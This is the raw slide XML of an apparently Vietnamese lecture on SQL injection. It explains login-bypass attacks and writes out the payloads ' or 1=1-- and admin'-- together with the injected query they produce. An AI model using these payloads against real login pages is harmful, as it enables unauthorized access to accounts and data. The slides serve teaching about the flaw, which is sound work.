          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>câu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dựa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INSERT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stored-procedures</a:t>
            </a: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3225254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718559" y="701521"/>
            <a:ext cx="7612067" cy="3190696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công có thể dễ dàng vượt qua các trang đăng nhập nhờ vào lỗi khi dùng các câu lệnh SQL thao tác trên cơ sở dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>liệu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ệ thống sẽ kiểm tra tên đăng nhập và mật khẩu có hợp lệ hay không để quyết định cho phép hay từ chối thực hiện tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nếu thành công, thì có thể login vào mà không cần phải biết username và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>trường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hợp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947615" y="169491"/>
            <a:ext cx="7262798" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Tấn công vượt qua kiểm tra đăng nhập (username/password)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="515610" y="3672483"/>
            <a:ext cx="8126808" cy="4517009"/>
            <a:chOff x="467544" y="1014632"/>
            <a:chExt cx="8676456" cy="6310512"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="16200000" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="467544" y="1014632"/>
              <a:ext cx="8676456" cy="6310512"/>
              <a:chOff x="467544" y="1006739"/>
              <a:chExt cx="8676456" cy="6310512"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="50" name="Group 49"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="467544" y="1006739"/>
                <a:ext cx="8676456" cy="6310512"/>
                <a:chOff x="467544" y="4363913"/>
                <a:chExt cx="8676456" cy="6310512"/>
              </a:xfrm>
              <a:grpFill/>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="Rectangle 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="467544" y="4797153"/>
                  <a:ext cx="8676456" cy="5877272"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:grpFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="508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sp>
              <p:nvSpPr>
                <p:cNvPr id="53" name="Oval 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="467544" y="4363913"/>
                  <a:ext cx="1062372" cy="10623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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="TextBox 50"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="881982" y="1737966"/>
                <a:ext cx="7767367" cy="3431463"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Nhập thông tin vào ô username hoặc password là 'or 1=1--. </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" lvl="1" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Nhập vào ô còn lại với nội dung bất kỳ, sau đó click vào nút Login.</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>C</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>âu lệnh truy vấn</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>      </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Select*from </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>TAIKHOAN where TenDangNhap=' 'or 1=1-- 'and MatKhau=''</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  </a:rPr>
                  <a:t></a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> C</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>húng ta có thể dễ dàng đăng nhập vào hệ thống</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>vì</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>: đ</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>iều kiện trong mệnh đề WHERE luôn</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>luôn</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> đúng và kết quả truy vấn sẽ trả về tất cả các bản ghi của bảng TAIKHOAN</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="TextBox 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="589119" y="1247796"/>
              <a:ext cx="819219" cy="577255"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>TH1</a:t>
              </a:r>
              <a:endParaRPr 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62" name="Group 61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="515610" y="3977415"/>
            <a:ext cx="8126808" cy="4546102"/>
            <a:chOff x="467544" y="973987"/>
            <a:chExt cx="8676456" cy="6351156"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="16200000" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="63" name="Group 62"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="467544" y="973987"/>
              <a:ext cx="8676456" cy="6351156"/>
              <a:chOff x="467544" y="966094"/>
              <a:chExt cx="8676456" cy="6351156"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="65" name="Group 64"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="467544" y="966094"/>
                <a:ext cx="8676456" cy="6351156"/>
                <a:chOff x="467544" y="4323268"/>
                <a:chExt cx="8676456" cy="6351156"/>
              </a:xfrm>
              <a:grpFill/>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="67" name="Rectangle 66"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="467544" y="4797152"/>
                  <a:ext cx="8676456" cy="5877272"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:grpFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="508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sp>
              <p:nvSpPr>
                <p:cNvPr id="68" name="Oval 67"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1544283" y="4323268"/>
                  <a:ext cx="1062372" cy="104994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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66" name="TextBox 65"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="881982" y="1484856"/>
                <a:ext cx="7767367" cy="4353557"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" b="1"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dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Sử dụng kí tự đặc biệt “--".</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Giá trị nhập </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>vào:</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Username</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>: admin'--</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
